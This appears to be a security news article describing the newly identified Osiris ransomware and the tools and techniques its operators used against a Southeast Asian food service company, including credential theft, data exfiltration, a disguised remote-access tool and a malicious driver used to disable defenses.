A new ransomware strain, dubbed Osiris, has been identified launching attacks against a major food service company in Southeast Asia in November 2025. Security researchers distinguish this as an entirely new malware family, unrelated to an older ransomware with the same name from 2016. The emergence of this advanced Osiris ransomware underscores the increasing sophistication of encryption-based threats targeting critical infrastructure and business operations.
The observed attack campaign showcases advanced tactics, techniques, and procedures (TTPs) commonly employed by experienced threat actors. Attackers utilized a diverse toolkit, blending legitimate system utilities with malicious software to infiltrate the victim’s network, establish persistence, and ultimately deploy the ransomware payload. This incident highlights how modern cybercriminals abuse everyday Windows tools alongside custom-developed malware to evade detection and bypass existing security controls. The use of living off the land techniques allows for stealthier operations against organizations.
Osiris Ransomware Leverages Living off the Land and Dual-use Tools
Symantec analysts detected the malware by noticing suspicious patterns that aligned with previously documented Inc ransomware campaigns. Researchers pointed out technical overlaps, including identical filenames for credential extraction tools and similar data exfiltration methodologies. Before encrypting files, the attackers employed Rclone to steal data, uploading the compromised information to Wasabi cloud storage buckets. A well-known tool for extracting credentials, Mimikatz, was specifically used in a version named kaz.exe, a tactic observed in previous Inc attacks.
The threat actors also deployed Netexec, Netscan, and a modified version of the Rustdesk remote management software, disguised as WinZip, to maintain access within the compromised network. This multi-faceted approach demonstrates a strategic effort to gain deep access and control.
Exploitation of Malicious Drivers and Defense Bypass
A particularly concerning aspect of this attack campaign involves the deployment of a malicious driver named Poortry, also known as Abyssworker. This custom-developed driver masqueraded as legitimate Malwarebytes software, aiming to deceive system administrators. Attackers utilized this driver in what security experts term a bring-your-own-vulnerable-driver (BYOVD) attack, which allowed them to disable security software by exploiting kernel-level access. BYOVD attacks have become a preferred method for ransomware operators seeking to neutralize endpoint defenses. By deploying signed vulnerable drivers, attackers can escalate privileges and terminate security processes without immediately triggering alerts.
The Poortry driver is notable as it was developed by the attackers themselves, rather than exploiting existing vulnerable code, indicating a high level of sophistication within the threat group. This custom development suggests a significant investment in their attack infrastructure.
The Osiris ransomware itself encrypts files using an advanced hybrid encryption method that combines Elliptic Curve Cryptography (ECC) and AES-128-CTR. Each encrypted file is protected by a unique key, making decryption significantly more challenging. To further hinder recovery efforts, the ransomware terminates databases and backup services while deleting volume shadow copies. These advanced technical capabilities, coupled with the sophisticated attack chain, strongly suggest experienced operators are behind this new Osiris ransomware threat family.
The ongoing evolution of ransomware tactics, particularly the increased reliance on living off the land tools and sophisticated defense bypass techniques like BYOVD, necessitates a continuous adaptation of cybersecurity strategies. Organizations must remain vigilant and invest in robust security measures to detect and mitigate such advanced threats.